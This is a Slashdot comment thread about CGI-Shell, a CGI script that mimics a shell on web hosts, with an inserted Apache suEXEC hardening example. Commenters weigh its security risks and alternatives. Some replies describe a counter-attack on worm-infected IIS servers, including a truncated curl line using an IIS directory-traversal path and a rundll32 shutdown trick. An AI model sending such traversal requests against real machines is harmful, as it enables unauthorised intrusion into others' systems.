Shell Simulation Via CGI
mischi writes "CGI-Shell simulates a shell using CGI. So everybody who has a CGI-directory on a web-server, also has its own shell on it -- comparable with Telnet or SSH.
That's really practical, because most webhosters don't offer a shell (for free) -- but do offer CGI.
With CGI-Shell you can execute commands, copy files or just explore your webserver. Even a history and auto-completion with tabulator are included."
Re:security? (Score:5, Informative)
If two or more people on a server both install this, they can read and modify each other's files, etc. since the CGIs will be running as the same user.
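The shared-UID problem described in this comment is what per-account CGI execution is meant to remove: if the web server hands each account's scripts to its own UID and GID, one account's CGI cannot read or modify another's files through ordinary file permissions. The fragment below is an added example, not configuration from the page or from the CGI-Shell project; it uses Apache's mod_suexec directive `SuexecUserGroup`, and the hostname, paths, user and group are placeholders.

```apacheconf
# Added example: one virtual host per hosting account, each running its CGIs
# under that account's own UID/GID via suEXEC (Apache must be built with
# suexec support and have the setuid suexec helper installed).
<VirtualHost *:80>
    # placeholder hostname for the account
    ServerName alice.example.com
    # placeholder document root owned by the account
    DocumentRoot /home/alice/www
    # placeholder user and group; CGIs here run as alice:alice, not as the
    # web server's shared user, so another account's CGI-Shell cannot reach them
    SuexecUserGroup alice alice
    ScriptAlias /cgi-bin/ /home/alice/cgi-bin/
</VirtualHost>
```

This only helps if the account directories themselves are not world-readable (for example mode 0750 or 0700 on /home/alice), since suEXEC changes who a script runs as, not what the filesystem permits.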
Probable hosting service response. (Score:5, Informative)
Min
Re:Shell whores. (Score:3, Informative)
You can get more info here [eggheads.org].
Re:security? (Score:5, Informative)
Re:security? (Score:2, Informative)
Re:I've used something exactly like this for months (Score:2, Informative)
So you could limit it to ls, rm, mv, and cp with the user's security level.
All it does is shell commands and pipe stdout back onto the form.
It's such a trivial script I'm surprised it's newsworthy even by
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
I like this idea better than a cgi-bin shell which might pass along naughty combinations of characters, and has everything in plain text to risk snooping.
lynx!? (Score:3, Informative)
I give the hosted users of my server [frob.us] ssh access for the sole reason that it keeps them from running shit like this.
Despite the BOFH myths, which I am guilty of perpetuating, not all sysadmins are jackasses. So long as the sysadmin knows you and you promise not to abuse privileges you can get everything short of root and
If you really need shell access and don't want to risk losing your account just send your sysadmin a thinkgeek caffeine sampler and some shirts. Massive capacity SCSI disks are a great substitute.
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
TightVNC also includes a java client if you want to have a graphical remote connection.
I carry a business card size cd with putty and tightVNC and such on it to use most of the time though...
Reinventing the wheel... (Score:2, Informative)
Re:Doesn't IIS Already Have This? (Score:2, Informative)
It just redirects the client making the request to try and load the given page from the local machine. Assuming that the client making the request (the worm) understands redirections, that line makes it attempt to load 127.0.0.1 (the local IIS server that the worm infected) with a URL that will exploit the local worm (hehe) and use rundll32 to shut down the client's windows machine.
If it works, it's brilliant. I'm not sure the worm reads redirects, though. Anyone actually witness this working?
Even better; use the Java Telnet Application (Score:3, Informative)
BS (Score:3, Informative)
Example: Can the standard unix permissions give access to everyone in group a,b, and c, except for user x who is also a member of groups b and c, and y, as well as ensuring that z has full access to everything? No, you can't.
If you allow your customers to upload their own cgis, this is merely a tool.
This IS a good tool.
Actually, that is EXACTLY what they've done (Score:2, Informative)
Re:Doesn't IIS Already Have This? (Score:3, Informative)
would be nice, tho
Re:Doesn't IIS Already Have This? (Score:1, Informative)
curl http://$HISADDR/scripts/..%255c..%255cwinnt/syste
Shell != ability to run one command at a time (Score:3, Informative)
A shell is more than the ability to run simple commands; it provides an environment to run commands, maintain a command-line history, spawn processes, store variables, etc.
And any good CGI Shell should also take output from the system command and format it into HTML that will display in a browser the same as it would in the shell.
Am I missing something here, or is this "cgi shell" thing really not newsworthy?
This is new? (Score:4, Informative)
Since this got so much publicity I was expecting something new, such as the ability to interact with interactive programs. But it seems this one lacks that feature as well, in essence making it a poor substitute for a real shell. Pico, micq, bitchx, su, passwd, any interactive program is UNUSABLE.
That is its biggest limitation.